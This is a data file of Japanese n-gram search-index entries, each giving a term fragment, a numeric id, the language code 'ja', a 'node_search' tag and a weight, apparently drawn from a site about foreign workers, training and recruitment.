('の世界', 62, 'ja', 'node_search', 0.498827),
('の両方', 27, 'ja', 'node_search', 0.472657),
('の両方', 136, 'ja', 'node_search', 1),
('の両面', 177, 'ja', 'node_search', 0.749958),
('の中で', 23, 'ja', 'node_search', 1),
('の中で', 169, 'ja', 'node_search', 0.961087),
('の人材', 23, 'ja', 'node_search', 0.66666),
('の今後', 176, 'ja', 'node_search', 0.873132),
('の介護', 121, 'ja', 'node_search', 1),
('の介護', 165, 'ja', 'node_search', 1),
('の介護', 169, 'ja', 'node_search', 1),
('の介護', 170, 'ja', 'node_search', 1),
('の介護', 171, 'ja', 'node_search', 1),
('の介護', 188, 'ja', 'node_search', 0.909743),
('の仕事', 7, 'ja', 'node_search', 1.8861),
('の仕事', 23, 'ja', 'node_search', 0.424938),
('の仕事', 24, 'ja', 'node_search', 0.628375),
('の仕事', 28, 'ja', 'node_search', 1),
('の仕事', 68, 'ja', 'node_search', 1),
('の仕事', 73, 'ja', 'node_search', 1),
('の仕事', 77, 'ja', 'node_search', 4),
('の仕事', 87, 'ja', 'node_search', 2.42113),
('の仕事', 188, 'ja', 'node_search', 1),
('の仕事', 189, 'ja', 'node_search', 1),
('の付き', 162, 'ja', 'node_search', 0.736141),
('の代理', 142, 'ja', 'node_search', 0.889397),
('の休暇', 8, 'ja', 'node_search', 2),
('の会話', 87, 'ja', 'node_search', 0.839384),
('の会話', 138, 'ja', 'node_search', 0.757065),
('の住宅', 27, 'ja', 'node_search', 1.70508),
('の使用', 87, 'ja', 'node_search', 0.759465),
('の依頼', 69, 'ja', 'node_search', 0.993146),
('の修繕', 27, 'ja', 'node_search', 0.662985),
('の候補', 154, 'ja', 'node_search', 1.78691),
('の候補', 157, 'ja', 'node_search', 1),
('の候補', 165, 'ja', 'node_search', 3.99983),
('の候補', 167, 'ja', 'node_search', 1.81645),
('の候補', 169, 'ja', 'node_search', 4.16849),
('の候補', 173, 'ja', 'node_search', 4.04752),
('の候補', 176, 'ja', 'node_search', 1.74069),
('の健康', 5, 'ja', 'node_search', 0.813674),
('の優先', 138, 'ja', 'node_search', 0.727213),
('の元で', 24, 'ja', 'node_search', 1),
('の充実', 168, 'ja', 'node_search', 0.842342),
('の充実', 170, 'ja', 'node_search', 0.824901),
('の共同', 24, 'ja', 'node_search', 0.346538),
('の写真', 95, 'ja', 'node_search', 1),
('の出発', 76, 'ja', 'node_search', 4),
('の出発', 165, 'ja', 'node_search', 1),
('の出発', 173, 'ja', 'node_search', 2),
('の出発', 174, 'ja', 'node_search', 1),
('の出発', 184, 'ja', 'node_search', 1),
('の分野', 3, 'ja', 'node_search', 0.655756),
('の分野', 7, 'ja', 'node_search', 1.8861),
('の分野', 10, 'ja', 'node_search', 2),
('の初め', 9, 'ja', 'node_search', 3),
('の初め', 17, 'ja', 'node_search', 4),
('の初回', 133, 'ja', 'node_search', 0.957226),
('の副大', 9, 'ja', 'node_search', 3),
('の副大', 17, 'ja', 'node_search', 4),
('の努力', 140, 'ja', 'node_search', 1),
('の努力', 160, 'ja', 'node_search', 1),
('の努力', 161, 'ja', 'node_search', 1),
('の努力', 166, 'ja', 'node_search', 1),
('の努力', 168, 'ja', 'node_search', 1),
('の努力', 170, 'ja', 'node_search', 1),
('の努力', 171, 'ja', 'node_search', 0.957226),
('の努力', 174, 'ja', 'node_search', 1),
('の努力', 175, 'ja', 'node_search', 1),
('の努力', 177, 'ja', 'node_search', 0.953396),
('の努力', 178, 'ja', 'node_search', 1),
('の努力', 179, 'ja', 'node_search', 1),
('の努力', 180, 'ja', 'node_search', 1),
('の努力', 181, 'ja', 'node_search', 1),
('の努力', 185, 'ja', 'node_search', 1),
('の努力', 187, 'ja', 'node_search', 1),
('の努力', 188, 'ja', 'node_search', 1),
('の努力', 189, 'ja', 'node_search', 1),
('の努力', 191, 'ja', 'node_search', 1),
('の努力', 194, 'ja', 'node_search', 1),
('の努力', 196, 'ja', 'node_search', 1),
('の努力', 197, 'ja', 'node_search', 1),
('の努力', 198, 'ja', 'node_search', 1),
('の努力', 199, 'ja', 'node_search', 1),
('の労働', 3, 'ja', 'node_search', 0.63167),
('の労働', 27, 'ja', 'node_search', 0.58995),
('の勤勉', 135, 'ja', 'node_search', 0.845322),
('の勤務', 18, 'ja', 'node_search', 1),
('の北海', 78, 'ja', 'node_search', 1),
('の協力', 28, 'ja', 'node_search', 28),
('の単調', 142, 'ja', 'node_search', 1),
('の原則', 140, 'ja', 'node_search', 1),
('の取得', 183, 'ja', 'node_search', 1),
('の受講', 62, 'ja', 'node_search', 4),
('の受験', 19, 'ja', 'node_search', 3),
('の可能', 120, 'ja', 'node_search', 1),
('の可能', 196, 'ja', 'node_search', 0.997306),
('の合格', 24, 'ja', 'node_search', 0.707906),
('の合格', 155, 'ja', 'node_search', 0.752312),
('の合格', 160, 'ja', 'node_search', 1),
('の合格', 161, 'ja', 'node_search', 1),
('の合格', 166, 'ja', 'node_search', 1),
('の合格', 168, 'ja', 'node_search', 1),
('の合格', 170, 'ja', 'node_search', 1),
('の合格', 178, 'ja', 'node_search', 1),
('の合格', 179, 'ja', 'node_search', 1),
('の合格', 180, 'ja', 'node_search', 1),
('の合格', 181, 'ja', 'node_search', 1),
('の合格', 185, 'ja', 'node_search', 1),
('の合格', 186, 'ja', 'node_search', 1),
('の合格', 187, 'ja', 'node_search', 1),
('の合格', 188, 'ja', 'node_search', 1),
('の合格', 189, 'ja', 'node_search', 1),
('の合格', 190, 'ja', 'node_search', 1),
('の合格', 191, 'ja', 'node_search', 1),
('の合格', 192, 'ja', 'node_search', 1),
('の合格', 193, 'ja', 'node_search', 1),
('の合格', 194, 'ja', 'node_search', 1),
('の合格', 195, 'ja', 'node_search', 1),
('の合格', 196, 'ja', 'node_search', 1),
('の合格', 197, 'ja', 'node_search', 1),
('の合格', 198, 'ja', 'node_search', 1),
('の合格', 199, 'ja', 'node_search', 1),
('の名義', 27, 'ja', 'node_search', 0.34557),
('の向上', 181, 'ja', 'node_search', 1),
('の向上', 182, 'ja', 'node_search', 1.88282),
('の向上', 183, 'ja', 'node_search', 1),
('の周辺', 24, 'ja', 'node_search', 0.35965),
('の命名', 133, 'ja', 'node_search', 1),
('の国の', 24, 'ja', 'node_search', 0.98493),
('の基礎', 27, 'ja', 'node_search', 0.360701),
('の売買', 27, 'ja', 'node_search', 0.341283),
('の外職', 142, 'ja', 'node_search', 0.781775),
('の外食', 161, 'ja', 'node_search', 1),
('の外食', 167, 'ja', 'node_search', 1),
('の外食', 173, 'ja', 'node_search', 0.997306),
('の外食', 174, 'ja', 'node_search', 1),
('の外食', 175, 'ja', 'node_search', 1),
('の外食', 176, 'ja', 'node_search', 1),
('の外食', 177, 'ja', 'node_search', 1),
('の外食', 187, 'ja', 'node_search', 1),
('の外食', 190, 'ja', 'node_search', 1),
('の外食', 192, 'ja', 'node_search', 1),
('の外食', 194, 'ja', 'node_search', 1),
('の外食', 195, 'ja', 'node_search', 1),
('の外食', 198, 'ja', 'node_search', 1),
('の大き', 161, 'ja', 'node_search', 1),
('の大き', 181, 'ja', 'node_search', 0.923838),
('の大き', 194, 'ja', 'node_search', 1),
('の大人', 87, 'ja', 'node_search', 1),
('の大切', 178, 'ja', 'node_search', 1),
('の大切', 186, 'ja', 'node_search', 1),
('の大切', 187, 'ja', 'node_search', 1),
('の大切', 192, 'ja', 'node_search', 0.961087),
('の大型', 77, 'ja', 'node_search', 4),
('の大都', 111, 'ja', 'node_search', 1),
('の姉妹', 69, 'ja', 'node_search', 1),
('の子ど', 126, 'ja', 'node_search', 1),
('の子会', 27, 'ja', 'node_search', 0.333475),
('の存続', 27, 'ja', 'node_search', 0.460161),
('の学位', 10, 'ja', 'node_search', 2),
('の学位', 30, 'ja', 'node_search', 0.953396),
('の学士', 10, 'ja', 'node_search', 1),
('の学生', 95, 'ja', 'node_search', 1),
('の学生', 136, 'ja', 'node_search', 0.96498),
('の学習', 142, 'ja', 'node_search', 0.689612),
('の学習', 176, 'ja', 'node_search', 1),
('の学習', 181, 'ja', 'node_search', 1),
('の学習', 183, 'ja', 'node_search', 1),
('の学習', 191, 'ja', 'node_search', 1),
('の学習', 195, 'ja', 'node_search', 1),
('の安全', 156, 'ja', 'node_search', 1),
('の安全', 157, 'ja', 'node_search', 1),
('の実務', 198, 'ja', 'node_search', 0.98493),
('の実践', 136, 'ja', 'node_search', 0.863659),
('の宿泊', 164, 'ja', 'node_search', 1),
('の宿泊', 166, 'ja', 'node_search', 1),
('の宿泊', 168, 'ja', 'node_search', 1),
('の専門', 62, 'ja', 'node_search', 1),
('の専門', 170, 'ja', 'node_search', 0.848323),
('の尊厳', 87, 'ja', 'node_search', 0.606252),
('の導入', 142, 'ja', 'node_search', 1),
('の就労', 186, 'ja', 'node_search', 0.892724),
('の就職', 23, 'ja', 'node_search', 0.523573),
('の就職', 132, 'ja', 'node_search', 1),
('の就職', 155, 'ja', 'node_search', 1),
('の工場', 24, 'ja', 'node_search', 0.584241),
('の幼い', 80, 'ja', 'node_search', 4),
('の建物', 27, 'ja', 'node_search', 2.12796),
('の建設', 5, 'ja', 'node_search', 3),
('の建設', 27, 'ja', 'node_search', 0.557303),
('の強い', 186, 'ja', 'node_search', 1),
('の当た', 135, 'ja', 'node_search', 0.819249),
('の役割', 80, 'ja', 'node_search', 1),
('の待遇', 120, 'ja', 'node_search', 19),
('の従業', 23, 'ja', 'node_search', 0.792123),
('の従業', 77, 'ja', 'node_search', 1),
('の必要', 135, 'ja', 'node_search', 1),
('の応募', 133, 'ja', 'node_search', 0.712106),
('の慈善', 27, 'ja', 'node_search', 0.528135),
('の成功', 136, 'ja', 'node_search', 0.685676),
('の成功', 174, 'ja', 'node_search', 0.842342),
('の成果', 62, 'ja', 'node_search', 0.676032),
('の成果', 140, 'ja', 'node_search', 1),
('の成果', 160, 'ja', 'node_search', 1),
('の成果', 161, 'ja', 'node_search', 1),
('の成果', 166, 'ja', 'node_search', 1),
('の成果', 168, 'ja', 'node_search', 1),
('の成果', 170, 'ja', 'node_search', 1),
('の成果', 176, 'ja', 'node_search', 1),
('の成果', 179, 'ja', 'node_search', 1),
('の成果', 180, 'ja', 'node_search', 1),
('の成果', 182, 'ja', 'node_search', 4),
('の成果', 186, 'ja', 'node_search', 1),
('の成果', 189, 'ja', 'node_search', 1),
('の成果', 191, 'ja', 'node_search', 1),
('の成果', 192, 'ja', 'node_search', 1),
('の成果', 193, 'ja', 'node_search', 1),
('の成果', 195, 'ja', 'node_search', 1),
('の成果', 196, 'ja', 'node_search', 1),
('の成果', 198, 'ja', 'node_search', 1),
('の成果', 199, 'ja', 'node_search', 2),
('の成長', 198, 'ja', 'node_search', 0.920273),
('の扉が', 187, 'ja', 'node_search', 0.972861),
('の手続', 160, 'ja', 'node_search', 0.882818),
('の手続', 161, 'ja', 'node_search', 0.934703),
('の手続', 166, 'ja', 'node_search', 0.920273),
('の手続', 168, 'ja', 'node_search', 0.923838),
('の手続', 170, 'ja', 'node_search', 0.934703),
('の手続', 178, 'ja', 'node_search', 0.953396),
('の手続', 179, 'ja', 'node_search', 0.771698),
('の手続', 186, 'ja', 'node_search', 0.916736),
('の手続', 187, 'ja', 'node_search', 0.866793),
('の手続', 190, 'ja', 'node_search', 0.909743),
('の手続', 191, 'ja', 'node_search', 0.851346),
('の手続', 193, 'ja', 'node_search', 0.833529),
('の手続', 194, 'ja', 'node_search', 0.886095),
('の手続', 195, 'ja', 'node_search', 0.863659),
('の手続', 198, 'ja', 'node_search', 0.819249),
('の手配', 136, 'ja', 'node_search', 0.66666),
('の技術', 23, 'ja', 'node_search', 0.484898),
('の指導', 116, 'ja', 'node_search', 1),
('の指導', 136, 'ja', 'node_search', 1.72703),
('の授業', 24, 'ja', 'node_search', 0.760609),
('の採用', 160, 'ja', 'node_search', 3.99047),
('の採用', 161, 'ja', 'node_search', 1.74996),
('の採用', 166, 'ja', 'node_search', 4.08679),
('の採用', 168, 'ja', 'node_search', 1.75946),
('の採用', 170, 'ja', 'node_search', 3.98118),
('の採用', 178, 'ja', 'node_search', 1.78178),
('の採用', 179, 'ja', 'node_search', 1.73165),
('の採用', 180, 'ja', 'node_search', 1.80007),
('の採用', 185, 'ja', 'node_search', 4.00925),
('の採用', 186, 'ja', 'node_search', 1.76922),
('の採用', 187, 'ja', 'node_search', 3.96276),
('の採用', 188, 'ja', 'node_search', 1.76188),
('の採用', 189, 'ja', 'node_search', 3.99983),
('の採用', 190, 'ja', 'node_search', 4.07688),
('の採用', 191, 'ja', 'node_search', 4.2327),
('の採用', 192, 'ja', 'node_search', 4.11692),
('の採用', 193, 'ja', 'node_search', 4.17901),
('の採用', 194, 'ja', 'node_search', 4.00925),
('の採用', 195, 'ja', 'node_search', 1.80545),
('の採用', 196, 'ja', 'node_search', 4.18961),
('の採用', 197, 'ja', 'node_search', 4.07688),
('の採用', 198, 'ja', 'node_search', 1.78178),
('の採用', 199, 'ja', 'node_search', 4.01872),
('の提供', 23, 'ja', 'node_search', 1),
('の支え', 154, 'ja', 'node_search', 0.942091),
('の支店', 27, 'ja', 'node_search', 1),
('の支援', 23, 'ja', 'node_search', 0.439448),
('の教室', 28, 'ja', 'node_search', 3),
('の教師', 136, 'ja', 'node_search', 0.740689),
('の教師', 142, 'ja', 'node_search', 0.749958),
('の文化', 3, 'ja', 'node_search', 0.822065),
('の文化', 77, 'ja', 'node_search', 4),
('の文化', 122, 'ja', 'node_search', 1),
('の新し', 154, 'ja', 'node_search', 1),
('の新し', 166, 'ja', 'node_search', 0.863659),
('の新し', 171, 'ja', 'node_search', 0.923838),
('の新し', 175, 'ja', 'node_search', 0.993146),
('の新し', 177, 'ja', 'node_search', 0.920273),
('の新し', 187, 'ja', 'node_search', 0.833529),
('の新し', 199, 'ja', 'node_search', 0.816452),
('の新た', 126, 'ja', 'node_search', 1),
('の新た', 164, 'ja', 'node_search', 4),
('の新た', 165, 'ja', 'node_search', 0.931053),
('の新た', 169, 'ja', 'node_search', 4),
('の新た', 174, 'ja', 'node_search', 27),
('の新た', 175, 'ja', 'node_search', 27),
('の新た', 177, 'ja', 'node_search', 27),
('の新た', 178, 'ja', 'node_search', 0.916736),
('の新た', 185, 'ja', 'node_search', 0.805455),
('の新た', 188, 'ja', 'node_search', 0.797402),
('の新た', 189, 'ja', 'node_search', 0.813674),
('の新た', 197, 'ja', 'node_search', 1),
('の新潟', 62, 'ja', 'node_search', 1),
('の方が', 19, 'ja', 'node_search', 28),
('の方は', 163, 'ja', 'node_search', 0.670377),
('の方を', 163, 'ja', 'node_search', 1),
('の旅に', 80, 'ja', 'node_search', 1),
('の旅に', 140, 'ja', 'node_search', 1),
('の旅を', 1, 'ja', 'node_search', 0.989021),
('の旅を', 62, 'ja', 'node_search', 0.938382),
('の旅を', 120, 'ja', 'node_search', 1),
('の日に', 29, 'ja', 'node_search', 3),
('の日本', 24, 'ja', 'node_search', 0.392305),
('の日本', 62, 'ja', 'node_search', 0.595774),
('の日本', 76, 'ja', 'node_search', 4),
('の日本', 163, 'ja', 'node_search', 0.72066),
('の日本', 173, 'ja', 'node_search', 0.792123),
('の日本', 174, 'ja', 'node_search', 0.749958),
('の日本', 175, 'ja', 'node_search', 0.800068),
('の日本', 176, 'ja', 'node_search', 0.769219),
('の最初', 69, 'ja', 'node_search', 1),
('の有名', 95, 'ja', 'node_search', 1),
('の期間', 3, 'ja', 'node_search', 0.58995),
('の東京', 134, 'ja', 'node_search', 1),
('の栽培', 163, 'ja', 'node_search', 0.945829),
('の様子', 98, 'ja', 'node_search', 1),
('の機会', 28, 'ja', 'node_search', 1),
('の機会', 62, 'ja', 'node_search', 0.521322),
('の機会', 116, 'ja', 'node_search', 1),
('の機会', 135, 'ja', 'node_search', 0.76188),
('の機会', 174, 'ja', 'node_search', 0.953396),
('の機会', 185, 'ja', 'node_search', 0.927431),
('の機会', 187, 'ja', 'node_search', 0.906287),
('の機会', 194, 'ja', 'node_search', 0.827757),
('の機会', 198, 'ja', 'node_search', 0.942091),
('の残業', 8, 'ja', 'node_search', 2),
('の活動', 27, 'ja', 'node_search', 0.693594),
('の活動', 150, 'ja', 'node_search', 1),
('の活躍', 180, 'ja', 'node_search', 0.927431),
('の活躍', 185, 'ja', 'node_search', 0.869951),
('の活躍', 186, 'ja', 'node_search', 0.961087),
('の海外', 154, 'ja', 'node_search', 0.819249),
('の海外', 164, 'ja', 'node_search', 0.781775),
('の海外', 165, 'ja', 'node_search', 0.779231),
('の海外', 167, 'ja', 'node_search', 0.851346),
('の源で', 120, 'ja', 'node_search', 1),
('の準備', 138, 'ja', 'node_search', 1),
('の準備', 162, 'ja', 'node_search', 0.786915),
('の溶接', 9, 'ja', 'node_search', 3),
('の溶接', 17, 'ja', 'node_search', 4),
('の熟練', 30, 'ja', 'node_search', 28),
('の熱意', 199, 'ja', 'node_search', 0.997306),
('の特別', 7, 'ja', 'node_search', 3.8861),
('の特定', 141, 'ja', 'node_search', 1),
('の特定', 155, 'ja', 'node_search', 0.845322),
('の特定', 163, 'ja', 'node_search', 1),
('の現状', 26, 'ja', 'node_search', 1),
('の環境', 138, 'ja', 'node_search', 0.869951),
('の生徒', 140, 'ja', 'node_search', 21),
('の生活', 5, 'ja', 'node_search', 0.931053),
('の生活', 154, 'ja', 'node_search', 0.993146),
('の生活', 164, 'ja', 'node_search', 0.913226),
('の生活', 165, 'ja', 'node_search', 0.869951),
('の生活', 169, 'ja', 'node_search', 0.822065),
('の生活', 174, 'ja', 'node_search', 0.889397),
('の生活', 176, 'ja', 'node_search', 0.830633),
('の生活', 188, 'ja', 'node_search', 0.997306),
('の生産', 163, 'ja', 'node_search', 0.906287),
('の皆さ', 111, 'ja', 'node_search', 1),
('の皆さ', 140, 'ja', 'node_search', 1.81645),
('の皆さ', 146, 'ja', 'node_search', 1),
('の皆様', 162, 'ja', 'node_search', 1),
('の目標', 1, 'ja', 'node_search', 1),
('の目標', 26, 'ja', 'node_search', 27),
('の目標', 173, 'ja', 'node_search', 0.896076),
('の目的', 135, 'ja', 'node_search', 19),
('の知識', 142, 'ja', 'node_search', 0.714225),
('の知識', 193, 'ja', 'node_search', 0.976851),
('の磨き', 62, 'ja', 'node_search', 4),
('の福岡', 80, 'ja', 'node_search', 1),
('の秋田', 69, 'ja', 'node_search', 1),
('の移行', 142, 'ja', 'node_search', 0.640063),
('の積み', 179, 'ja', 'node_search', 1),
('の積み', 190, 'ja', 'node_search', 1),
('の積み', 191, 'ja', 'node_search', 1),
('の積み', 199, 'ja', 'node_search', 0.972861),
('の竣工', 27, 'ja', 'node_search', 0.842342),
('の第一', 160, 'ja', 'node_search', 4),
('の第一', 168, 'ja', 'node_search', 0.816452),
('の第一', 170, 'ja', 'node_search', 0.800068),
('の第一', 174, 'ja', 'node_search', 0.916736),
('の第一', 177, 'ja', 'node_search', 0.886095),
('の第一', 184, 'ja', 'node_search', 0.902857),
('の第一', 191, 'ja', 'node_search', 0.920273),
('の第一', 197, 'ja', 'node_search', 1),
('の管理', 7, 'ja', 'node_search', 1.8861),
('の節目', 120, 'ja', 'node_search', 1),
('の粘り', 192, 'ja', 'node_search', 1),
('の素晴', 160, 'ja', 'node_search', 0.968904),
('の素晴', 166, 'ja', 'node_search', 1),
('の素晴', 168, 'ja', 'node_search', 0.866793),
('の素晴', 170, 'ja', 'node_search', 0.876337),
('の素晴', 181, 'ja', 'node_search', 1),
('の素晴', 182, 'ja', 'node_search', 1),
('の素晴', 183, 'ja', 'node_search', 1),
('の素晴', 194, 'ja', 'node_search', 0.938382),
('の素晴', 195, 'ja', 'node_search', 0.934703),
('の素晴', 197, 'ja', 'node_search', 0.931053),
('の素晴', 198, 'ja', 'node_search', 0.889397),
('の細部', 27, 'ja', 'node_search', 0.444243),
('の紹介', 23, 'ja', 'node_search', 0.544759),
('の紹介', 24, 'ja', 'node_search', 0.623497),
('の経費', 8, 'ja', 'node_search', 2),
('の経験', 7, 'ja', 'node_search', 1.81353),
('の経験', 10, 'ja', 'node_search', 2),
('の経験', 133, 'ja', 'node_search', 1),
('の経験', 164, 'ja', 'node_search', 0.863659),
('の経験', 167, 'ja', 'node_search', 0.997306),
('の経験', 169, 'ja', 'node_search', 0.942091),
('の経験', 173, 'ja', 'node_search', 0.923838),
('の経験', 175, 'ja', 'node_search', 0.934703),
('の経験', 176, 'ja', 'node_search', 0.96498),
('の経験', 177, 'ja', 'node_search', 0.845322),
('の経験', 184, 'ja', 'node_search', 0.857458),
('の経験', 185, 'ja', 'node_search', 0.949597),
('の経験', 187, 'ja', 'node_search', 0.927431),
('の経験', 190, 'ja', 'node_search', 0.866793),
('の経験', 193, 'ja', 'node_search', 1),
('の経験', 194, 'ja', 'node_search', 0.845322),
('の経験', 197, 'ja', 'node_search', 0.869951),
('の結果', 189, 'ja', 'node_search', 0.889397),
('の給与', 5, 'ja', 'node_search', 1),
('の継続', 140, 'ja', 'node_search', 0.813674),
('の習慣', 24, 'ja', 'node_search', 0.771698),
('の職を', 3, 'ja', 'node_search', 0.623497),
('の職場', 136, 'ja', 'node_search', 0.934703),
('の職場', 155, 'ja', 'node_search', 1),
('の育成', 161, 'ja', 'node_search', 0.848323),
('の背後', 122, 'ja', 'node_search', 0.972861),
('の自信', 193, 'ja', 'node_search', 1),
('の自動', 27, 'ja', 'node_search', 0.351463),
('の興味', 142, 'ja', 'node_search', 1),
('の良い', 30, 'ja', 'node_search', 1.84234),
('の若者', 23, 'ja', 'node_search', 0.511433),
('の表れ', 188, 'ja', 'node_search', 1),
('の裏に', 191, 'ja', 'node_search', 1),
('の要件', 5, 'ja', 'node_search', 0.776703),
('の言う', 87, 'ja', 'node_search', 1),
('の言葉', 62, 'ja', 'node_search', 0.536316),
('の言語', 24, 'ja', 'node_search', 1.43876),
('の言語', 62, 'ja', 'node_search', 0.957226),
('の言語', 138, 'ja', 'node_search', 0.857458),
('の訓練', 26, 'ja', 'node_search', 1),
('の訪問', 162, 'ja', 'node_search', 1),
('の設計', 27, 'ja', 'node_search', 0.538701),
('の評価', 29, 'ja', 'node_search', 3),
('の詳細', 62, 'ja', 'node_search', 2.58083),
('の誇り', 156, 'ja', 'node_search', 1),
('の誇り', 157, 'ja', 'node_search', 0.980874),
('の貴重', 62, 'ja', 'node_search', 0.703756),
('の資格', 156, 'ja', 'node_search', 1),
('の資格', 157, 'ja', 'node_search', 1),
('の賞賛', 27, 'ja', 'node_search', 0.413458),
('の賞賛', 122, 'ja', 'node_search', 0.916736),
('の輸入', 23, 'ja', 'node_search', 0.980874),
('の輸入', 27, 'ja', 'node_search', 0.882818),
('の通り', 27, 'ja', 'node_search', 1.18581),
('の通り', 157, 'ja', 'node_search', 1),
('の造船', 6, 'ja', 'node_search', 28),
('の造船', 8, 'ja', 'node_search', 27),
('の造船', 10, 'ja', 'node_search', 28),
('の造船', 23, 'ja', 'node_search', 0.609315),
('の造船', 24, 'ja', 'node_search', 1),
('の連携', 24, 'ja', 'node_search', 0.343175),
('の進学', 181, 'ja', 'node_search', 0.949597),
('の進学', 182, 'ja', 'node_search', 0.98493),
('の達成', 62, 'ja', 'node_search', 0.485867),
('の適切', 133, 'ja', 'node_search', 1),
('の重要', 122, 'ja', 'node_search', 2),
('の重要', 180, 'ja', 'node_search', 0.961087),
('の開校', 142, 'ja', 'node_search', 19),
('の間に', 3, 'ja', 'node_search', 1),
('の間に', 26, 'ja', 'node_search', 1),
('の面接', 70, 'ja', 'node_search', 1),
('の面接', 71, 'ja', 'node_search', 1),
('の面接', 72, 'ja', 'node_search', 1),
('の面接', 74, 'ja', 'node_search', 1),
('の面接', 75, 'ja', 'node_search', 1),
('の面接', 81, 'ja', 'node_search', 4),
('の面接', 82, 'ja', 'node_search', 1),
('の面接', 84, 'ja', 'node_search', 1),
('の面接', 90, 'ja', 'node_search', 1),
('の面接', 100, 'ja', 'node_search', 4),
('の面接', 101, 'ja', 'node_search', 4),
('の面接', 102, 'ja', 'node_search', 1),
('の面接', 107, 'ja', 'node_search', 1),
('の面接', 109, 'ja', 'node_search', 1),
('の面接', 112, 'ja', 'node_search', 1),
('の面接', 114, 'ja', 'node_search', 1),
('の面接', 115, 'ja', 'node_search', 1),
('の面接', 117, 'ja', 'node_search', 1),
('の面接', 131, 'ja', 'node_search', 1),
('の面接', 134, 'ja', 'node_search', 1),
('の面接', 135, 'ja', 'node_search', 1),
('の面接', 136, 'ja', 'node_search', 2),
('の面接', 137, 'ja', 'node_search', 1),
('の面接', 139, 'ja', 'node_search', 1),
('の面接', 141, 'ja', 'node_search', 1),
('の面接', 143, 'ja', 'node_search', 1),
('の面接', 144, 'ja', 'node_search', 1),
('の韓国', 29, 'ja', 'node_search', 28),
('の食品', 115, 'ja', 'node_search', 1),
('の食材', 122, 'ja', 'node_search', 1),
('の高い', 23, 'ja', 'node_search', 0.43245),
('の高い', 25, 'ja', 'node_search', 1),
('の高い', 26, 'ja', 'node_search', 1),
('の黄金', 62, 'ja', 'node_search', 0.524706),
('はあり', 3, 'ja', 'node_search', 0.842342),
('はあり', 5, 'ja', 'node_search', 1.6653),
('はあり', 98, 'ja', 'node_search', 1),
('はお早', 163, 'ja', 'node_search', 0.635),
('はきち', 87, 'ja', 'node_search', 0.931053),
('はそれ', 10, 'ja', 'node_search', 1),
('はない', 3, 'ja', 'node_search', 0.731649),
('はアブ', 18, 'ja', 'node_search', 28),
('はカリ', 142, 'ja', 'node_search', 0.661163),
('はコス', 27, 'ja', 'node_search', 0.433985),
('はニュ', 23, 'ja', 'node_search', 1),
('はニュ', 138, 'ja', 'node_search', 1),
('はミャ', 26, 'ja', 'node_search', 1),
('はワー', 24, 'ja', 'node_search', 0.697623),
('は一生', 98, 'ja', 'node_search', 1),
('は下記', 24, 'ja', 'node_search', 0.630018),
('は両親', 80, 'ja', 'node_search', 1),
('は交通', 5, 'ja', 'node_search', 0.873132),
('は介護', 162, 'ja', 'node_search', 1),
('は以下', 27, 'ja', 'node_search', 1.19138),
('は以下', 155, 'ja', 'node_search', 0.78951),
('は以下', 157, 'ja', 'node_search', 1),
('は信頼', 27, 'ja', 'node_search', 0.498827),
('は優遇', 162, 'ja', 'node_search', 0.645209),
('は優遇', 163, 'ja', 'node_search', 0.66666),
('は先輩', 87, 'ja', 'node_search', 1),
('は問題', 3, 'ja', 'node_search', 1),
('は報わ', 140, 'ja', 'node_search', 1),
('は外国', 7, 'ja', 'node_search', 28.8861),
('は外国', 28, 'ja', 'node_search', 1),
('は実費', 163, 'ja', 'node_search', 0.747619),
('は当社', 142, 'ja', 'node_search', 0.899454),
('は揺る', 120, 'ja', 'node_search', 1),
('は支払', 5, 'ja', 'node_search', 0.916736),
('は新た', 180, 'ja', 'node_search', 0.997306),
('は新た', 186, 'ja', 'node_search', 1),
('は日本', 136, 'ja', 'node_search', 0.731649),
('は日本', 173, 'ja', 'node_search', 1),
('は日本', 184, 'ja', 'node_search', 1),
('は毎日', 142, 'ja', 'node_search', 1.69359),
('は溶接', 3, 'ja', 'node_search', 0.703756),
('は理念', 27, 'ja', 'node_search', 0.544759),
('は異な', 162, 'ja', 'node_search', 0.989021),
('は皆さ', 140, 'ja', 'node_search', 1),
('は皆様', 1, 'ja', 'node_search', 1),
('は研修', 169, 'ja', 'node_search', 1),
('は秋田', 150, 'ja', 'node_search', 1),
('は自動', 23, 'ja', 'node_search', 0.993146),
('は自己', 5, 'ja', 'node_search', 0.997306),
('は言語', 24, 'ja', 'node_search', 0.797402),
('は言語', 62, 'ja', 'node_search', 0.752312),
('は誰が', 3, 'ja', 'node_search', 43),
('は通常', 5, 'ja', 'node_search', 1),
('は重要', 3, 'ja', 'node_search', 0.866793),
('は非常', 140, 'ja', 'node_search', 0.842342),
('は韓国', 24, 'ja', 'node_search', 1),
('は高齢', 136, 'ja', 'node_search', 0.800068),
('ばなり', 18, 'ja', 'node_search', 0.909743),
('ばれる', 25, 'ja', 'node_search', 1),
('ば尚良', 30, 'ja', 'node_search', 0.931053),
('ば市で', 163, 'ja', 'node_search', 1),
('ば銀行', 3, 'ja', 'node_search', 0.997306),
('びたい', 3, 'ja', 'node_search', 0.909743),
('びたい', 28, 'ja', 'node_search', 3),
('びつけ', 179, 'ja', 'node_search', 0.899454),
('びです', 135, 'ja', 'node_search', 0.776703),
('びの合', 161, 'ja', 'node_search', 1),
('び介助', 162, 'ja', 'node_search', 0.776703),
('び収穫', 163, 'ja', 'node_search', 0.927431),
('び政府', 27, 'ja', 'node_search', 0.386749),
('び民間', 27, 'ja', 'node_search', 1.14861),
('び特定', 162, 'ja', 'node_search', 1),
('ぶこと', 23, 'ja', 'node_search', 0.480114),
('ぶこと', 122, 'ja', 'node_search', 1),
('ぶこと', 155, 'ja', 'node_search', 0.957226),
('ぶにし', 87, 'ja', 'node_search', 1),
('へのこ', 27, 'ja', 'node_search', 0.441832),
('へのご', 113, 'ja', 'node_search', 1),
('へのス', 196, 'ja', 'node_search', 0.920273),
('への出', 76, 'ja', 'node_search', 4),
('への出', 173, 'ja', 'node_search', 27),
('への大', 161, 'ja', 'node_search', 1),
('への大', 181, 'ja', 'node_search', 0.927431),
('への大', 186, 'ja', 'node_search', 1),
('への就', 23, 'ja', 'node_search', 0.524706),
('への扉', 187, 'ja', 'node_search', 0.976851),
('への旅', 80, 'ja', 'node_search', 1),
('への最', 69, 'ja', 'node_search', 1),
('への移', 142, 'ja', 'node_search', 0.641769),
('への第', 160, 'ja', 'node_search', 4),
('への第', 174, 'ja', 'node_search', 0.920273),
('への第', 177, 'ja', 'node_search', 0.889397),
('への第', 184, 'ja', 'node_search', 0.906287),
('への第', 191, 'ja', 'node_search', 0.923838),
('への第', 197, 'ja', 'node_search', 1),
('への重', 180, 'ja', 'node_search', 0.96498),
('へよう', 1, 'ja', 'node_search', 26),
